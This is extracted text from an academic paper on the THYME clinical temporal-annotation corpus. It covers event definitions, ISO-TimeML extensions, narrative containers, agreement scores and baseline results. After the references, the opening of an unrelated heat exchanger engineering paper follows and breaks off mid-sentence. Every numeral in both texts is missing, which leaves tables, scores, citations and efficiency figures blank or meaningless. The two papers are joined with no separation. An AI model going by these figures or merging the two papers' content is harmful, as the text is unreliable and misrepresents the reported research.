joint committee on cancer (ajcc) staging codes (e.g., t n , indicating the nature of the tumor, lymph node and metastasis involvement) are metic- ulously recorded, but are largely absent in the brain cancer notes which make up the second corpus in our project. so, although clinical notes share many similarities, annotators without sufficient domain ex- pertise may require additional training to adapt to the inferences and nuances of a new clinical subdomain. interpreting ‘event’ and temporal expressions in the clinical domain much prior work has been done on standardizing the annotation of events and temporal expressions in text. the most widely used approach is the iso- timeml specification (pustejovsky et al., ), an iso standard that provides a common framework for annotating and analyzing time, events, and event rela- tions. as defined by iso-timeml, an event refers to anything that can be said “to obtain or hold true, to happen or to occur”. this is a broad notion of event, consistent with bach’s use of the term “eventuality” (bach, ) as well as the notion of fluents in ai (mccarthy, ). because the goals of the thyme project involve automatically identifying the clinical timeline for a patient from clincal records, the scope of what should be admitted into the domain of events is inter- preted more broadly than in iso-timeml . within the thyme-timeml guideline, an event is any- thing relevant to the clinical timeline, i.e., anything that would show up on a detailed timeline of the pa- tient’s care or life. the best single-word syntactic head for the event is then used as its span. for example, a diagnosis would certainly appear on such a timeline, as would a tumor, illness, or procedure. on the other hand, entities that persist throughout the relevant temporal period of the clinical timeline (endurants in ontological circles) would not be con- sidered as event-like. this includes the patient, other humans mentioned (the patient’s mother-in-law or the doctor), organizations (the emergency room), non-anatomical objects (the patient’s car), or indi- vidual parts of the patient’s anatomy (an arm is not an event unless missing or otherwise notable). to meet our explicit goals, the thyme-timeml guideline introduces two additional levels of interpre- our use of the term ‘event’ corresponds with the less specific iso-timeml term ‘eventuality’ tation beyond that specified by iso-timeml: (i) a well-defined task; and (ii) a clearly identified domain. by focusing on the creation of a clinical timeline from clinical narrative, the guideline imposes con- straints that cannot be assumed for a broadly defined and domain independent annotation schema. some events annotated under our guideline are considered meaningful and eventive mostly by virtue of a specific clinical or legal value. for example, ajcc staging codes (discussed in section ) are eventive only in the sense of the code being assigned to a tumor at a given moment in the patient’s care. however, they are of such critical importance and informative value to doctors that we have chosen to annotate them specifically so that they will show up on the patient’s timeline in a clinical setting. similarly, because of legal pressures to establish in- formed consent and patient knowledge of risk, entire paragraphs of clinical notes are dedicated to docu- menting the doctor’s discussion of risks, plans, and alternative strategies. as such, we annotate verbs of discussion (“we talked about the risks of this drug”), consent (“she agreed with the current plan”), and comprehension (“mrs. larsen repeated the potential side effects back to me”), even though they are more relevant to legal defense than medical treatment. it is also because of this grounding in clinical lan- guage that entities and other non-events are often interpreted in terms of their associated eventive prop- erties. there are two major types for which this is a significant shift in semantic interpretation: ( ) a medication as event: orders: lariam twice daily. b disorder as event: tumor of the left lung. in both these cases, entities which are not typically marked as events are identified as such, because they contribute significant information to the clinical time- line being constructed. in ( a), for example, the timex “twice daily” is interpreted as scoping over the eventuality of the patient taking the medication, not the prescription event. in sentence ( b), the “tu- mor” is interpreted as a stative eventuality of the patient having a tumor located within an anatomical region, rather than an entity within an entity. within the medical domain, these eventive inter- pretations of medications, growths and status codes are unambiguous and consistent. doctors in clini- cal notes (unlike in biomedical research texts) do not discuss medications without an associated (im- plicit) administering event (though some mentions may be hypothetical, generic or negated). similarly, mentions of symptoms or disorders reflect occur- rences in a patient’s life, rather than abstract entities. with these interpretations in mind, we can safely in- fer, for instance, that all umls (unified medical language system, (bodenreider, )) entities of the types disorder, chemical/drug, procedure and sign/symptom will be events. in general, in the medical domain, it is essential to read “between the lines” of the shorthand expressions used by the doctors, and recognize implicit events that are being referred to by specific anatomical sites or medications. modifications to iso-timeml for the clinical domain overall, we have found that the specification required for temporal annotation in the clinical domain does not require substantial modification from existing specifications for the general domain. the clinical domain includes no shortage of inferences, short- hands, and unusual use of language, but the structure of the underlying timeline is not unique. as a result of this, we have been able to adopt most of the framework from iso-timeml, adapting the guidelines where needed, as well as reframing the focus of what gets annotated. this is reflected in a comprehensive guideline, incorporating the specific patterns and uses of events and temporal expressions as seen in clinical data. this approach allows the resulting annotations to be interoperable with exist- ing solutions, while still accommodating the major differences in the nature of the texts. our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org our extensions of the iso-timeml specification to the clinical domain are intended to address specific constructions, meanings, and phenomena in medical texts. our schema differs from iso-timeml in a few notable ways. event properties we have both simplified the iso-timeml coding of events, and extended it to meet the needs of the clinical domain and the specific language goals of the clinical narrative. access to the corpus will require a data use agreement. more information about this process is available from the corpus website. consider, for example, how modal subordination is handled in iso-timeml. this involves the semantic characterization of an event as “likely”, “possible”, or as presented by observation, evidence, or hearsay. all of these are accounted for compositionally in iso- timeml within the slink (subordinating link) relation (pustejovsky et al., ). while accept- ing iso-timeml’s definition of event modality, we have simplified the annotation task within the cur- rent guideline, so that events now carry attributes for “contextual modality”, “contextual aspect” and “permanence”. contextual modality allows the values actual, hypothetical, hedged, and generic. actual covers events which have actually happened, e.g., “we’ve noted a tumor”. hypothetical covers con- ditionals and possibilities, e.g., “if she develops a tumor”. hedged is for situations where doctors proffer a diagnosis, but do so cautiously, to avoid legal liability for an incorrect diagnosis or for over- looking a correct one. for example: ( ) a. the signal in the mri is not inconsistent with a tumor in the spleen. b. the rash appears to be measles, awaiting antibody test to confirm. these hedged events are more real than a hypo- thetical diagnosis, and likely merit inclusion on a timeline as part of the diagnostic history, but must not be conflated with confirmed fact. these (and other forms of uncertainty in the medical domain) are discussed extensively in (vincze et al., ). in contrast, generic events do not refer to the pa- tient’s illness or treatment, but instead discuss illness or treatment in general (often in the patient’s specific demographic). for example: ( ) in other patients without significant comor- bidity that can tolerate adjuvant chemother- apy, there is a benefit to systemic adjuvant chemotherapy. these sections would be true if pasted into any pa- tient’s note, and are often identical chunks of text repeatedly used to justify a course of action or treat- ment as well as to defend against liability. contextual aspect (to distinguish from grammati- cal aspect), allows the clinically-necessary category, intermittent. this serves to distinguish intermit- tent events (such as vomiting or seizures) from constant, more stative events (such as fever or sore- ness). for example, the bolded event in ( a) would be marked as intermittent, while that in ( b) would not: ( ) a she has been vomiting since june. b she has had swelling since june. in the first case, we assume that her vomiting has been intermittent, i.e., there were several points since june in which she was not actively vomiting. in the second case, unless made otherwise explicit (“she has had occasional swelling”), we assume that swelling was a constant state. this property is also used when a particular instance of an event is intermittent, even though it generally would not be: ( ) since starting her new regime, she has had occa- sional bouts of fever, but is feeling much better. the permanence attribute has two values, finite and permanent. permanence is a property of dis- eases themselves, roughly corresponding to the med- ical concept of “chronic” vs. “acute” disease, which marks whether a disease is persistent following diag- nosis. for example, a (currently) uncurable disease like multiple sclerosis would be classed as perma- nent, and thus, once mentioned in a patient’s note, will be assumed to persist through the end of the patient’s timeline. this is compared with finite disorders like “influenza” or “fever”, which, if not mentioned in subsequent notes, should be considered cured and no longer belongs on the patient’s time- line. because it requires domain-specific knowledge, although present in the specification, permanence is not currently annotated. however, annotators are trained on the basic idea and told about subsequent axiomatic assignment. the addition of this property to our schema is designed to relieve annotators of any feeling of obligation to express this inferred informa- tion in some other way. timex types temporal expressions (timex s) in the clinical domain function the same as in the gen- eral linguistic community, with two notable excep- tions. iso-timeml sets (statements of frequency) occur quite frequently in the medical domain, par- ticularly with regard to medications and treatments. medication sections within notes often contain long lists of medications, each with a particular associated set (“claritin mg twice daily”), and further tempo- ral specification is not uncommon (e.g., “three times per day at meals”, “once a week at bedtime”). the second major change for the medical domain is a new type of timex which we call prepos- texp. this covers temporally complex terms like “preoperative”, “postoperative”, and “intraoperative”. these temporal expressions designate a span of time bordered, usually only on one side, by the incorpo- rated event (an operation, in the previous events). in many cases, the referent is clear: ( ) she underwent hemicolectomy last week, and had some postoperative bleeding. here we understand that “postoperative” refers to “the period of time following the hemicolectomy”. in these cases, the prepostexp makes explicit a tempo- ral link between the bleeding and the hemicolectomy. in other cases, no clear referent is present: ( ) patient shows some post-procedure scarring. in these situations, where no procedure is mentioned (or the reference is never explicitly resolved), we treat the prepostexp as a narrative container (see section ), covering the span of time following the unnamed procedure. finally, it is worth noting that the process of nor- malizing those timex s is significantly more com- plex relative to the general domain, because many temporal expressions are anchored not to dates or times, but to other events (whose dates are often not mentioned or not known by the physician). as we move towards a complete system, we are working to expand the iso-timeml system for timex nor- malization to allow some value to be assigned to a phrase like “in the months after her hemicolectomy” when no referent date is present. iso-timeml, in discussion with iso tc sc , plans to reference to such timex s in a future release of the standard. temporal ordering and narrative containers the semantic content and informational impact of a timeline is encoded in the ordering relations that are identified between the temporal and event expres- sions present in clinical notes. iso-timeml speci- fies the standard thirteen “allen relations” from the interval calculus (allen, ), which it refers to as tlink values. for unguided, general-purpose annota- tion, the number of relations that could be annotated grows quadratically with the number of events and times, and the task quickly becomes unmanageable. there are, however, strategies that we can adopt to make this labeling task more tractable. temporal ordering relations in text are of three kinds: . relations between two events . relations between two times . relations between a time and an event. iso-timeml, as a formal specification of the tem- poral information conveyed in language, makes no distinction between these ordering types. humans, however, do make distinctions, based on local tempo- ral markers and the discourse relations established in a narrative (miltsakaki et al., ; poesio, ). because of the difficulty of humans capturing ev- ery relationship present in the note (and the disagree- ment which arises when annotators attempt to do so), it is vital that the annotation guidelines describe an approach that reduces the number of relations that must be considered, but still results in maximally in- formative temporal links. we have found that many of the weaknesses in prior annotation approaches stem from interaction between two competing goals: • the guideline should specify certain types of an- notations that should be performed; • the guideline should not force annotations to be performed when they need not be. failing in the first goal will result in under-annotation and the neglect of relations which provide necessary information for inference and analysis. failure in the second goal results in over-annotation, creating com- plex webs of temporal relations which yield mostly inferable information, but which complicate annota- tion and adjudication considerably. our method of addressing both goals in tempo- ral relations annotation is that of the narrative con- tainer, discussed in pustejovsky and stubbs ( ). a narrative container can be thought of as a temporal bucket into which an event or series of events may fall, or a natural cluster of events around a given time or situation. these narrative containers are often represented (or “anchored”) by dates or other temporal expressions (within which a variety of different events occur), although they can also be anchored to more abstract concepts (“recovery” which might involve a variety of events) or even durative events (many other events can occur dur- ing a surgery). rather than marking every possible tlink between each event, we instead try to link all events to their narrative containers, and then link those containers so that the contained events can be linked by inference. first, annotators assign each event to one of four broad narrative containers: before the doctime, be- fore and overlapping the doctime, just overlapping the doctime or after the doctime. this narrative container is identified by the event attribute doc- timerel. after the assignment of doctimerel, the remainder of the narrative container relations must be specified using temporal links (tlinks). there are five different temporal relations used for such tlinks: before, overlap, begins-on, ends-on and contains . due to our narrative container ap- proach, contains is the most frequent relation by a large margin. events serving as narrative container anchors are not tagged as containers per-se. instead, annotators use the narrative container idea to help them visu- alize the temporal relations within a document, and then make a series of contains tlink annotations which establish events and timex s as anchors, and specify their contents. if the annotators do their jobs correctly, properly implementing doctimerel and creating accurate tlinks, a good understanding of the narrative containers present in a document will naturally emerge from the annotated text. the major advantage introduced with narrative containers is this: a narrative event is placed within a bounding temporal interval which is explicitly men- tioned in the text. this allows events within sep- arate containers to be linked by post-hoc inference, temporal reasoning, and domain knowledge, rather than by explicit (and time-consuming) one-by-one temporal relations annotation. a secondary advantage is that this approach works nicely with the general structure of story-telling in both the general and clinical domains, and provides a compelling and useful metaphor for interpreting time- lines. often, especially in clinical histories, doctors will cluster discussions of symptoms, interventions and diagnoses around a given date (e.g. a whole para- graph starting “june :”), a specific hospitaliza- tion (“during her january stay at mercy”), or a given illness or treatment (“while she underwent chemo”). even when specific events are not explicitly or- dered within a cluster (often because the order can be easily inferred with domain knowledge), it is often quite easy to place the events into containers, and just a few tlinks can order the containers relative to one another with enough detail to create a clinically useful understanding of the overall timeline. narrative containers also allow the inference of re- lations between sub-events within nested containers: this is a subset of the iso-timeml tlink types, excluding those seldom occurring in medical records, like ‘simultaneous’ as well as inverse relations like ‘during’ or ‘after’. ( ) december th: the patient underwent an mri and ekg as well as emergency surgery. dur- ing the surgery, the patient experienced mild tachycardia, and she also bled significantly during the initial incision. . december th contains mri . december th contains ekg . december th contains surgery a. surgery contains tachycardia b. surgery contains incision c. incision contains bled through our container nesting, we can automatically infer that ‘bled’ occurred on december th (because ‘ th’ contains ‘surgery’ which contains ‘inci- sion’ which contains ‘bled’). this also allows the capture of event/sub-event relations, and the rapid expression of complex temporal interactions. explicit vs. inferable annotation given a specification language, there are essentially two ways of introducing the elements into the docu- ment (data source) being annotated: • manual annotation: elements are introduced into the document directly by the human annotator fol- lowing the guideline. • automatic (inferred) annotation: elements are cre- ated by applying an automated procedure that in- troduces new elements that are derivable from the human annotations. as such, there is a complex interaction between spec- ification and guideline, and we focus on how the clinical annotation task has helped shape and refine the annotation guidelines. it is important to note that an annotation guideline does not necessarily force the markup of certain elements in a text, even though the specification language (and the eventual goal of the project) might require those annotations to exist. in some cases, these added annotations are derived logically from human annotations. explicitly marked temporal relations can be used to infer others that are not marked but exist implicitly through closure. for instance, given events a, b and c and tlinks ‘a before b’ and ‘b before c’, the tlink ‘a be- fore c’ can be automatically inferred. repeatedly applying such inference rules allows all inferable we ignore the application of automatic techniques, such as classifiers trained on external datasets, as our focus here is on the preparation of the gold standard used for such classifiers. tlinks to be generated (verhagen, ). we can use this idea of closure to show our annotators which annotations need not be marked explicitly, saving time and effort. we have also incorporated these clo- sure rules into our inter-annotator agreement (iaa) calculation for temporal relations, described further in section . . the automatic application of rules following the annotation of the text is not limited to the marking of logically inferable relations or events. in the clinical domain, the combination of within-group shared knowledge and pressure towards concise writ- ing leads to a number of common, inferred relations. take, for example, the sentence: ( ) jan : colonoscopy, biopsies. pathology showed adenocarcinoma, resected at mercy. diagnosis t n adenocarcinoma. in this sentence, only the contains relations be- tween “jan ” and the events (in bold) are explicitly stated. however, based on the known progression-of-care for colon cancer, we can infer that the colonoscopy occurs first, biopsies occur dur- ing the colonoscopy, pathology happens afterwards, a diagnosis (here, adenocarcinoma) is returned after pathology, and resection of the tumor occurs after diagnosis. the presence of the ajcc staging infor- mation in the final sentence (along with the confir- mation of the adenocarcinoma diagnosis) implies a post-surgical pathology exam of the resected spec- imen, as the ajcc staging information cannot be determined without this additional examination. these inferences come naturally to domain ex- perts but are largely inaccessible to people outside the medical community without considerable anno- tator training. making explicit our understanding of these “understood orderings” is crucial; although they are not marked by human annotators in our schema, the annotators often found it initially frustrating to leave these (purely inferential) relations unstated. al- though many of our (primarily linguistically trained) annotators learned to see these patterns, we chose to exclude them from the manual task since newer an- notators with varying degrees of domain knowledge may struggle if asked to manually annotate them. similar unspoken-but-understood orderings are found throughout the clinical domain. as mentioned in section , both permanence and contextual as- pect:intermittent are properties of symptoms and dis- eases themselves, rather than of the patient’s particu- lar situation. as such, these properties could easily annotation type raw count event , timex , link total , table : raw frequency of annotation types tlink type raw count % of tlinks contains , . % overlap , . % before , . % begins-on . % ends-on . % total , . % table : relative frequency of tlink types be identified and marked across a medical ontology, and then be automatically assigned to events rec- ognized as specific medical named entities. finally, due to the peculiarities of ehr systems, some annotations must be done programatically. ex- act dates of patient visit (or of pathology/radiology consult) are often recorded as metadata on the ehr itself, rather than within the text, making the canoni- cal doctime (or time of automatic section modifi- cations) difficult to access in de-identified plaintext data, but easy to find automatically. results we report results on the annotations from the here- released subset of the thyme colon cancer corpus, which includes clinical notes and pathology reports for patients diagnosed with colon cancer for a total of documents. each note was annotated by a pair of graduate or undergraduate students in linguistics at the university of colorado, then adju- dicated by a domain expert. these clinical narratives were sampled from the ehrs of a major healthcare center (the mayo clinic). they were deidentified for all patient-sensitive information; however, original dates were retained. . descriptive statistics table presents the raw counts for events, temporal expressions and links in the adjudicated gold anno- tations. table presents the number and percentage of tlinks by type in the adjudicated relations gold annotations. annotation type f -score alpha event . . timex . . link: participants only . . link: participants+type . . link: contains . . table : iaa (f -score and alpha) by annotation type event property f -score alpha doctimerel . . cont.aspect . . cont.modality . . table : iaa (f -score and alpha) for event properties . inter-annotator agreement we report inter-annotator agreement (iaa) results on the thyme corpus. each note was annotated by two independent annotators. the final gold standard was produced after disagreement adjudication by a third annotator was performed. we computed the iaa as f -score and krippen- dorff’s alpha (krippendorff, ) by applying clo- sure, using explicitly marked temporal relations to identify others that are not marked but exist implicitly. in the computation of the iaa, inferred-only tlinks do not contribute to the score, matched or unmatched. for instance, if both annotators mark a before b and b before c, to prevent artificially inflating the agreement score, the inferred a before c is ignored. likewise, if one annotator marked a before b and b before c and the other annotator did not, the inferred a before c is not counted. however, if one annotator did explicitly mark a before c, then an equivalent inferred tlink would be used to match it. event and timex iaa was generated based on exact and overlapping spans, respectively. these results are reported in table . the thyme corpus also differs from iso- timeml in terms of event properties, with the addition of doctimerel, contextualmodality and contextualaspect. iaa for these properties is in table . . baseline systems to get an idea of how much work will be neces- sary to adapt existing temporal information extrac- tion systems to the clinical domain, we took the freely available cleartk-timeml system (bethard, ), tempeval thyme corpus p r f p r f timex . . . . . . event . . . . . . doctimerel - - - . . . link . . . . . . event-timex - - - . . . event-event - - - . . . table : performance of cleartk-timeml models, as reported in the tempeval competition, and as applied to the thyme corpus development set. which was among the top performing systems in tempeval (uzzaman et al., ), and eval- uated its performance on the thyme corpus. cleartk-timeml uses support vector machine classifiers trained on the tempeval training data, employing a small set of features including character patterns, tokens, stems, part-of-speech tags, nearby nodes in the constituency tree, and a small time word gazetteer. for events and timex s, the cleartk-timeml system could be applied di- rectly to the thyme corpus. for doctimerels, the relation for an event was taken from the tlink between that event and the document creation time, after mapping includes to overlap. events with no such tlink were assumed to have a doc- timerel of overlap. for other temporal relations, includes was mapped to contains. results of this system on tempeval and the thyme corpus are shown in table . for time ex- pressions, performance when moving to the clinical data degrades about %, from f of . to . . for events, the degradation is much larger, about %, from . to . , most likely because of the large number of clinical symptoms, diseases, disor- ders, etc. which have never been observed by the system during training. temporal relations are a bit more difficult to compare because tempeval lumped doctimerel and other temporal relations together and had several differences in their evaluation met- ric . however, we at least can see that performance of the cleartk-timeml system on temporal rela- tions is low on clinical text, achieving only f of . . these results suggest that clinical narratives do the tempeval evaluation metric penalized systems for parts of the text that were not examined by annotators, and used different variants of closure-based precision and recall. indeed present new challenges for temporal informa- tion extraction systems, and that having access to domain specific training data will be crucial for ac- curate extraction in the clinical domain. at the same time, it is encouraging that we were able to apply existing iso-timeml-based systems to our corpus, despite the several extensions to iso-timeml that were necessary for clinical narratives. discussion contains plays a large role in the thyme cor- pus, representing % of tlink annotations made, compared with only . % for overlap, the second most frequent type. we also see that before links are relatively less common than overlap and con- tains, illustrating that much of the temporal ordering on the timeline is accomplished by using many ver- tical links (contains, overlap) to build contain- ers, and few horizontal links (before, begins-on, ends-on) to order them. iaa on events and temporal expressions is strong, although differentiating implicit events (which should not be marked) from explicit, mark- able events remains one of the biggest sources of disagreement. when compared to the data from the i b challenge (sun et al., b), our iaa figures are quite similar. even with our more com- plex schema, we achieved an f -score of . for events (compared to the i b score of . for par- tial match). for timex s, our f -score was . , compared to an f -score of . for i b . tlinking medical events remains a very diffi- cult task. by using our narrative container approach to constrain the number of necessary annotations and by eliminating often-confusing inverse relations (like ‘after’ and ‘during’) (neither of which were done for the i b data), we were able to significantly improve on the i b tlink span agreement f -score of . , achieving an agreement score of . for all links across our corpus. the majority of remaining an- notator disagreement comes from different opinions about whether any two events require an explicit tlink between them or an inferred one, rather than what type of tlink it would be (e.g. before vs. contains). although our results are still signifi- cantly higher than the results reported for i b , and in line with previously reported general news figures, we are not satisfied. improving iaa is an important goal for future work, and with further training, speci- fication, experience, and standardization, we hope to clarify contexts for explicit tlinks. news-trained temporal information extraction sys- tems see a significant drop in performance when ap- plied to the clinical texts of the thyme corpus. but as the corpus is an extension of iso-timeml, future work will be able to train iso-timeml compliant systems on the annotations of the thyme corpus to reduce or eliminate this performance gap. some applications that our work may enable in- clude ( ) better understanding of event semantics, such as whether a disease is chronic or acute and its usual natural history, ( ) typical event duration for these events, ( ) the interaction of general and domain-specific events and their importance in the fi- nal timeline, and, more generally, ( ) the importance of rough temporality and narrative containers as a step towards finer-grained timelines. we have several avenues of ongoing and future work. first, we are working to demonstrate the utility of the thyme corpus for training machine learning models. we have designed support vector machine models with constituency tree kernels that were able to reach an f -score of . on an event-timex narrative container identification task (miller et al., ), and we are working on training models to identify events, times and the remaining types of temporal relations. second, as per our motivating use cases, we are working to integrate this annotation data with timeline visualization tools and to use these annotations in quality-of-care research. for example, we are using temporal reasoning built on this work to investigate the liver toxicity of methotrexate across a large corpus of ehrs (lin et al., under review)]. finally, we plan to explore the application of our notion of an event (anything that should be visible on a domain-appropriate timeline) to other domains. it should transfer naturally to clinical notes about other (non-cancer) conditions, and even to other types of clinical notes, as certain basic events should always be included in a patient’s timeline. applying our notion of event to more distant domains, such as legal opinions, would require first identifying a consensus within the domain about which events must appear on a timeline. conclusion much of the information in clinical notes critical to the construction of a detailed timeline is left implicit by the concise shorthand used by doctors. many events are referred to only by a term such as “tu- mor”, while properties of the event itself, such as “intermittent”, may not be specified. in addition, the ordering of events on a timeline is often left to the reader to infer, based on domain-specific knowledge. it is incumbent upon the annotation guideline to in- dicate that only informative event orderings should be annotated, while leaving domain-specific order- ings to post-annotation inference. this document has detailed our approach to adapting the existing iso-timeml standard to this recovery of implicit information, and defining guidelines that support an- notation within this complex domain. our guide- lines, as well as the annotated data, are available at http://thyme.healthnlp.org, and the full corpus has been proposed for use in a semeval shared task. acknowledgments the project described is supported by grant num- ber r lm and u lm from the na- tional library of medicine. the content is solely the responsibility of the authors and does not necessarily represent the official views of the national library of medicine or the national institutes of health. we would also like to thank dr. piet c. de groen and dr. brad erickson at the mayo clinic, as well as dr. william f. styler iii, for their contributions to the schema and to our understanding of the intricacies of clinical language. references james f allen. . maintaining knowledge about temporal intervals. communications of the acm, ( ): – . emmon bach. . the algebra of events. linguistics and philosophy, ( ): – . steven bethard. . cleartk-timeml: a minimalist ap- proach to tempeval . in second joint conference on lexical and computational semantics (*sem), vol- ume : proceedings of the seventh international work- shop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa, june. association for computational linguistics. olivier bodenreider. . the unified medical language system (umls): integrating biomedical terminology. nucleic acids research, (database issue):d –d , january. philip bramsen, pawan deshpande, yoong keok lee, and regina barzilay. . finding temporal order in discharge summaries. in amia annual symposium proceedings, volume , page . american medical informatics association. carlo combi, yuval shahar, et al. . temporal reason- ing and temporal data maintenance in medicine: issues and challenges. computers in biology and medicine, ( ): – . robert h dolin. . modeling the temporal complex- ities of symptoms. journal of the american medical informatics association, ( ): – . george hripcsak, nicholas d soulakis, li li, frances p morrison, albert m lai, carol friedman, neil s cal- man, and farzad mostashari. . syndromic surveil- lance using ambulatory electronic health records. jour- nal of the american medical informatics association, ( ): – . ann k irvine, stephanie w haas, and tessa sullivan. . tn-ties: a system for extracting temporal infor- mation from emergency department triage notes. in amia annual symposium proceedings, volume , page . american medical informatics association. elpida t keravnou. . temporal abstraction of med- ical data: deriving periodicity. in intelligent data analysis in medicine and pharmacology, pages – . springer. klaus h. krippendorff. . content analysis: an introduction to its methodology. sage publications, inc, third edition edition, april. chen lin, elizabeth karlson, dmitriy dligach, mon- ica ramirez, timothy miller, huan mo, natalie braggs, andrew cagan, joshua denny, and guer- gana. savova. under review. automatic identification of methotrexade-induced liver toxicity in rheumatoid arthritis patients from the electronic medical records. journal of the medical informatics association. john mccarthy. . actions and other events in sit- uation calculus. in proceedings of the international conference on principles of knowledge representation and reasoning, pages – . morgan kaufmann publishers; . stéphane m meystre, guergana k savova, karin c kipper- schuler, john f hurdle, et al. . extracting infor- mation from textual documents in the electronic health record: a review of recent research. yearb med inform, : – . timothy miller, steven bethard, dmitriy dligach, sameer pradhan, chen lin, and guergana savova. . dis- covering temporal narrative containers in clinical text. in proceedings of the workshop on biomedical natural langua ge processing, pages – , sofia, bulgaria, august. association for computational lin- guistics. eleni miltsakaki, rashmi prasad, aravind joshi, and bon- nie webber. . the penn discourse treebank. in in proceedings of lrec . massimo poesio. . discourse annotation and seman- tic annotation in the gnome corpus. in in proceedings of the acl workshop on discourse annotation. james pustejovsky and amber stubbs. . increasing informativeness in temporal annotation. in proceedings of the th linguistic annotation workshop, pages – . association for computational linguistics. james pustejovsky, robert knippen, jessica littman, and roser sauri. . temporal and event information in natural language text. language resources and evalu- ation, ( - ): – . james pustejovsky, kiyong lee, harry bunt, and laurent romary. . iso-timeml: an international standard for semantic annotation. in proceedings of the seventh international conference on language resources and evaluation (lrec ), valletta, malta. angus roberts, robert gaizauskas, mark hepple, george demetriou, yikun guo, and ian roberts. . build- ing a semantically annotated corpus of clinical texts. journal of biomedical informatics, ( ): – . guergana savova, steven bethard, will styler, james mar- tin, martha palmer, james masanz, and wayne ward. . towards temporal relation discovery from the clinical narrative. in amia annual symposium pro- ceedings, volume , page . american medical informatics association. tessa sullivan, ann irvine, and stephanie w haas. . it’s all relative: usage of relative temporal expressions in triage notes. proceedings of the american society for information science and technology, ( ): – . weiyi sun, anna rumshisky, and ozlem uzuner. a. evaluating temporal relations in clinical text: i b challenge. journal of the american medical informat- ics association. weiyi sun, anna rumshisky, and ozlem uzuner. b. evaluating temporal relations in clinical text: i b challenge. journal of the american medical informat- ics association, ( ): – . alexander turchin, maria shubina, eugene breydo, merri l pendergrass, and jonathan s einbinder. . comparison of information content of structured and narrative text data sources on the example of medica- tion intensification. journal of the american medical informatics association, ( ): – . naushad uzzaman, hector llorens, leon derczynski, james allen, marc verhagen, and james pustejovsky. . semeval- task : tempeval- : evaluating time expressions, events, and temporal relations. in sec- ond joint conference on lexical and computational semantics (*sem), volume : proceedings of the sev- enth international workshop on semantic evaluation (semeval ), pages – , atlanta, georgia, usa, june. association for computational linguistics. marc verhagen. . temporal closure in an annota- tion environment. language resources and evalua- tion, ( ): – . veronika vincze, gyrgy szarvas, richrd farkas, gyrgy mra, and jnos csirik. . the bioscope corpus: biomedical texts annotated for uncertainty, negation and their scopes. bmc bioinformatics, (suppl ): – . ying zhao, george karypis, and usama m. fayyad. . hierarchical clustering algorithms for docu- ment datasets. data mining and knowledge discovery, : – . jiaping zheng, wendy w chapman, rebecca s crowley, and guergana k savova. . coreference resolution: a review of general methodologies and applications in the clinical domain. journal of biomedical informatics, ( ): – . li zhou, simon parsons, and george hripcsak. . the evaluation of a temporal reasoning system in processing clinical discharge summaries. journal of the american medical informatics association, ( ): – . conference full paper template international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - design heat exchanger: optimization and efficiency haifa el-sadi*, joe aitken, jason ganley, david ruyffelaert, cam sweeney wentworth institute of technology huntington, boston, ma, usa *corresponding author: elsadih@wit.edu abstract—modern commercial and residential buildings procure hvac systems, to provide heating and cooling for designed open and enclosed spaces to dissipate throughout the accustomed zones. hvac (heating, ventilating, and air conditioning) systems have become a required industry standard for the construction of new buildings. the objective is the optimization of a heat exchanger model by resolving common system concerns; efficiency, fouling, leakage, dead zones, and vibration. these issues are prevalent in the hvac industry, which are critical to the under-performing heat exchangers. the heat exchanger was tested at only three different wind speeds ( , %, %) to take the temperature readings every minutes to allow for maximal heat transfer. the efficiency of heat exchanger at the specified speeds was determined to be . at %, . at % and . at %. keywords-heat exchanger; efficiency; buildings; design i. introduction mankind is about to install their millionth air conditioner. this baffling number creates great opportunity for engineers because behind each air conditioner there is a heat exchanger doing the heavy lifting to bring comfort to billions of people. heat exchangers have sought be an engineering challenge and still after million there are still problems that can be resolved. common problems that heat exchangers endure are fouling, dead zones, and leakage and tube vibrations. fouling is the reduction of performance due to the build of undesired material. this can be the result of corrosion within the heat exchanger and the lack of filtration prior to fluid entering the heat exchanger. dead zones can lead to significant fouling and are sections of the heat exchanger that the flow is notably less compared to the rest of the heat exchanger. in most cases dead zones are the result of baffles that most heat exchangers use. but in most cases the baffles are essential for the heat transfer so eliminating them cannot be discussed. leakage occurs when there is a loss of fluid from the heat exchanger, this results in reduced efficiency. typically, leakage is the result of faulty connections from poor welding or stressed joints. tube vibrations can cause the most significant damage to heat exchanger. this can be the result of very high velocity axial and perpendicular flow applications. in addition to resolving common heat exchanger problems the end goal is to improve the efficiency of the heat exchanger. r.l webb et al. focused on [ ] four design cases: ( ) reduced heat exchanger material; ( ) increased heat duty; ( ) reduced log-mean temperature difference; and ( ) reduced pumping power. the novel method was presented by b. linnhoff et al. [ ], the method is the first to combine sufficient simplicity to be used by hand with near certainty to identify “best” designs, even for large problems. “best” designs feature the highest degree of energy recovery possible with a given number of capital items. previous work [ ] showed that three rough tube applications are presented: . to obtain increased heat exchange capacity; . to reduce the friction power; and . to permit a reduction of heat-transfer surface area. adrian [ ] examined the coupling between losses due to heat transfer across the stream-to stream Δt and losses caused by fluid friction using the concept of heat-exchanger irreversibility. ii. design and analysis solid works was used to design different models of heat exchanger, equation engineering solver (ees) was used for calculations and analysis, the efficient prototype heat exchanger is shown in figure . table shows the dimensions of the inner tube and the properties of the fluid (water). international journal of advanced network, monitoring and controls volume , no. , figure . sectioned solidworks model of shell and tube heat exchanger with copper coil and finned inner wall. table i. internal flow calculations properties of water: properties were found at the average temperature between the surface of the pipe and liquid and a pressure of . n/m , using equation engineering solver (ees) to write the code and solve for the amount of heat transfer. table ii. external flow calculations initially the shell of the heat exchanger was going to be formed using sheet metal. with concerns of burn-through while welding the shell together it was determined that buying hvac duct would reduce manufacturing time and eliminate concerns of sealing the shell together. the second difference between the prototype and the model is the use of fans to send air through the shell. initially the plan was to incorporate fans within the shell that would send air through and out the other side. the main concern with this idea was if we were going to be able to vary the fan speed for calculation purposes. it was determined that a " flexible duct was attached from the heat exchanger to the wind turbine in wentworth's fluid dynamics lab where we would be able to vary wind speed during testing. not only did this decision save money it also eliminated doubt from our calculations. the third difference is the overall length of the prototype. this work initially planned to make the shell " long with " diameter. while we kept the diameter the same, the heat exchanger is now " long due to the need for an additional connection piece for the hvac duct that international journal of advanced network, monitoring and controls volume , no. , was not initially incorporated into the solidworks model. iii. manufacturing prototype parts the prototype consists of ten major part that will be assembled into a heat exchanger. the parts consist of the controller, pump, piping, valves, stand, reservoir, coil, slides, shell and caps. out of these nine parts, the stand, reservoir and slides needed to be manufactured in the projects lab. this work manufactured all these parts on the wentworth campus in the manufacturing lab and projects lab. the stand was 